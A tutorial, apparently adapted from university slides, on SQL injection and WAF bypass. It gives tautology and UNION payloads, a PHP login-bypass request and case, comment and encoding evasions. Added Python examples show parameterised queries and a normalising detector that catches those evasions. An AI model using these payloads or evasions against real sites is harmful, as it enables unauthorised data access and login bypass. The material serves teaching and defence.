All Ab0ut 0f SQL Injection and WAF Bypass Techniques

THATSANAI DETDAMRONGPREEECHA
COMPUTER SCIENCE @ KING MONGKUT'S INSTITUTE OF TECHNOLOGY LADKRABANG
What is SQL Injection?

SQL injection is a form of code injection.

It happens when a user injects SQL commands through input in order to change the condition of a query,

because the developer did not filter (validate) the input coming from the user.
Logical Conjunction and Disjunction table
SQL Operators

AND, &&

OR, ||

LIKE

*

( , )

< , >

+, -, *, /, %
SQL Comments

End of line:

"#"

"--"

"-- "

Multiple lines:

/* */
Examples

Vulnerable query and injected command

SQL command:
SELECT first_name, last_name FROM users WHERE user_id = '$id'

Injected code (each line is the query as it reaches the database once $id carries the payload):
SELECT first_name, last_name FROM users WHERE user_id = '1' or '1'
SELECT first_name, last_name FROM users WHERE user_id = 'am' or 'am'
SELECT first_name, last_name FROM users WHERE user_id = ' ' or '1'='1'
SELECT first_name, last_name FROM users WHERE user_id = ' ' or '2600'='2600'
SELECT first_name, last_name FROM users WHERE user_id = ' ' or 'HELLO' or 'HELLO'
SELECT first_name, last_name FROM users WHERE user_id = ' ' or 1 #'
SELECT first_name, last_name FROM users WHERE user_id = ' ' or true #'

SQL command:
SELECT first_name, last_name FROM users WHERE user_id = $id

Injected code:
true
'1' or '1'
2 or 2

SQL command:
SELECT first_name, last_name FROM users WHERE user_id = ($id)

Injected code:
1) or (1
2+3) or (5
http://cs.ssru.ac.th/cs01/mae/Pae/ตัวอย่างและโปรแกรมทีโ่ หลดๆมา/Login_thaicreate/PHP MySQL กับ Login
Form ทาระบบ User ล็อกอิ น แบบง่าย ๆ ด้วย PHP และ MySQL โดยทาการตรวจสอบ Username และ Password.htm
http://www.santosh143.com/2013/05/how-to-create-loginregister-system.html
http://www.exploit-db.com/exploits/26405/
http://www.exploit-db.com/exploits/26416/
Example

<?php
// Vulnerable login from the slides: $_GET['username'] is concatenated straight
// into the SQL string, so a crafted username rewrites the WHERE clause.
$sql = "SELECT * FROM members WHERE password='".md5($_GET['password'])."' AND username='".$_GET['username']."'";

$result = mysql_query($sql, $db);

if ($result === FALSE)
    die('Invalid SQL query');

// The login is accepted when exactly one row comes back.
if (mysql_num_rows($result) == 1) {
    echo "Congrats, WIN!!!\n";
} else {
    echo "The number of rows is not 1\n";
}
?>

Injected request:
login_sqli1.php?password=whatever&username='+or+1=1+LIMIT+1#
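The PHP above and the user_id queries earlier both build SQL by string concatenation. What follows is an added example, not the slides' code: it rebuilds both queries in Python against an in-memory SQLite database (standing in for MySQL; tables and rows are constructed sample data), runs the slides' own payloads through the concatenated and the parameterised forms, and applies the PHP's "exactly one row" acceptance rule. The function names are mine, and because SQLite only understands "--" comments the login payload ends in "--" where the slide's ends in "#". The parameterised functions are the "Securing Database Queries" tip from the mitigation slide in practice.

```python
import hashlib
import sqlite3

# Added example (not the slides' code). sqlite3 stands in for MySQL so it runs
# offline; the table contents below are constructed sample data.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "admin", "root"), (2, "alice", "smith")])
    db.execute("CREATE TABLE members (username TEXT, password TEXT)")
    db.executemany("INSERT INTO members VALUES (?, ?)",
                   [("alice", hashlib.md5(b"alice-secret").hexdigest()),
                    ("bob", hashlib.md5(b"bob-secret").hexdigest())])
    return db

# --- the slides' first query: ... WHERE user_id = '$id' --------------------
def vulnerable_lookup(db, user_id):
    # String concatenation: a quote inside user_id closes the literal and
    # whatever follows is parsed as part of the WHERE clause.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '" + user_id + "'"
    return db.execute(sql).fetchall()

def safe_lookup(db, user_id):
    # Parameterised: the value travels separately from the SQL text, so the
    # whole string is compared against user_id and is never parsed as SQL.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(sql, (user_id,)).fetchall()

# --- the slides' PHP login ---------------------------------------------------
def vulnerable_login(db, username, password):
    sql = ("SELECT * FROM members WHERE password='"
           + hashlib.md5(password.encode()).hexdigest()
           + "' AND username='" + username + "'")
    return db.execute(sql).fetchall()

def safe_login(db, username, password):
    sql = "SELECT * FROM members WHERE password=? AND username=?"
    digest = hashlib.md5(password.encode()).hexdigest()
    return db.execute(sql, (digest, username)).fetchall()

def login_ok(rows):
    # Same acceptance rule as the PHP: exactly one matching row.
    return len(rows) == 1

# The slides' payloads. The login one ends in "--" rather than "#" because
# SQLite only understands "--" comments (assumption about the stand-in DB).
TAUTOLOGY = "' or '1'='1"
LOGIN_PAYLOAD = "' or 1=1 LIMIT 1 --"

if __name__ == "__main__":
    db = make_db()
    print(vulnerable_lookup(db, "1"))         # one row
    print(vulnerable_lookup(db, TAUTOLOGY))   # every row: condition became '' or '1'='1'
    print(safe_lookup(db, TAUTOLOGY))         # no rows: no user_id equals that string
    print(login_ok(vulnerable_login(db, LOGIN_PAYLOAD, "whatever")))  # True, no password needed
    print(login_ok(safe_login(db, LOGIN_PAYLOAD, "whatever")))        # False
    print(login_ok(safe_login(db, "alice", "alice-secret")))          # True
```

The concatenated and parameterised functions receive byte-for-byte the same input; only the parameterised ones keep the query's structure fixed, which is why the "exactly one row" check stops being a security control the moment input reaches the SQL text unescaped.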
Impact

Read information from the database

Can lead to gaining access to the system

Etc.
Bypassing Web Application Firewall Techniques

What is a Web Application Firewall?

Web Application Firewall (WAF)

Software or hardware

Focused on protecting the website

Filters all data at the application layer

Can detect and block attacks against the website
How to Bypass?

Original:

1' or '1'='1

union all select 1,2,3,4,5 --

union all select 1,2,@@version,4,5 --

Solution (the same payloads rewritten so a case-sensitive or literal keyword filter no longer matches them):

1' oR '1'='1

uNIon AlL sELeCt 1,2,3,4,5 --

u/*2600*/ni/*12345*/on a/*..*/lL se/*AAAA*/lEct 1,2,@@VerSIon,4,5 --
How to Bypass (cont.)

If the filter blocks "or" and "and":

Solution:

Use || instead of or

Use && instead of and

If the filter blocks "where":

Solution:

Use limit instead of where

If the filter blocks "limit":

Solution:

Use group by and having instead of where

If the filter blocks whitespace:

Solution:

Use %0b instead of whitespace

If the filter blocks the single quote ('):

Solution:

Use 0xXX or unhex(xx) instead of '
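Every evasion on the slides above defeats a filter that matches on a literal token: letter case, inline comments, the || and && synonyms, and the vertical-tab character that %0b decodes to. The following is an added example, not from the slides: a toy detector that first canonicalises the input, which is the step a WAF has to perform before any signature is applied, and then checks the slides' own payloads against a literal substring blocklist and against the normalised match. The REQUESTS table, the two regex signatures and the function names are my own constructions; the 0xXX/unhex() case is not handled here.

```python
import re
from urllib.parse import unquote

# Constructed sample inputs: the slides' original payloads, their "solution"
# (evasion) forms from the bypass slides, and one benign value.
REQUESTS = {
    "orig_tautology": "1' or '1'='1",
    "orig_union": "union all select 1,2,3,4,5 --",
    "case_tautology": "1' oR '1'='1",
    "case_union": "uNIon AlL sELeCt 1,2,3,4,5 --",
    "comment_union": "u/*2600*/ni/*12345*/on a/*..*/lL se/*AAAA*/lEct 1,2,@@VerSIon,4,5 --",
    "pipes_tautology": "1' || '1'='1",
    "vtab_union": "union%0ball%0bselect%0b1,2,3,4,5",
    "benign": "O'Reilly",
}

# A literal-substring blocklist of the kind the slides defeat (my construction).
NAIVE_BLOCKLIST = ["union all select", " or ", " and ", "'"]

def naive_filter(payload):
    """Case-sensitive substring match on the raw parameter value."""
    return any(token in payload for token in NAIVE_BLOCKLIST)

def normalize(payload):
    """Canonicalise before matching: decode, strip comments, unify operators
    and whitespace, fold case. Each step undoes one evasion from the slides."""
    s = unquote(payload)                                  # %0b -> \x0b, %27 -> '
    s = re.sub(r"/\*.*?\*/", "", s, flags=re.S)           # u/*..*/nion -> union
    s = s.replace("||", " or ").replace("&&", " and ")    # MySQL's synonym operators
    s = re.sub(r"\s+", " ", s)                            # \s includes \x0b, \x0c, tabs
    return s.lower().strip()

# Illustrative signatures applied to the normalised text (my construction).
PATTERNS = [
    re.compile(r"\bunion\b(\s+all)?\s+select\b"),
    re.compile(r"\b(or|and)\b\s*'?[^'\s]+'?\s*=\s*'?[^'\s]+'?"),  # x=y tautology
]

def detect(payload):
    s = normalize(payload)
    return any(p.search(s) for p in PATTERNS)

def missed_by_naive():
    """Names of sample requests the literal blocklist misses but the
    normalised check catches."""
    return sorted(n for n, p in REQUESTS.items()
                  if detect(p) and not naive_filter(p))

if __name__ == "__main__":
    for name, payload in REQUESTS.items():
        print(f"{name:16} naive={naive_filter(payload)!s:5} "
              f"normalised={detect(payload)!s:5} -> {normalize(payload)!r}")
    print("missed by naive:", missed_by_naive())
```

Running it shows the literal blocklist missing the mixed-case, inline-comment and %0b forms of the UNION payload while flagging the benign O'Reilly on its apostrophe, which is the double failure of token filters: bypassable and false-positive prone. The normalised check catches all seven injected forms and passes the benign value, though the two patterns are deliberately small and a production rule set needs far more than that.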
How to Mitigate

Top 5 Secure Coding Tips for PHP applications

Filter Input Data

GET, POST, COOKIE

Securing Database Queries

Filter Output Data

htmlspecialchars()

htmlentities()

strip_tags()

strtr()

Error Handling

log_errors = On

display_errors = Off

Preventing other injection attacks
References and Appendix

www.owasp.org

http://palpapers.plynt.com/issues/2009Dec/secure-coding-php/

http://dev.mysql.com/doc/refman/5.0/en/non-typedoperators.html

http://thtutz.blogspot.com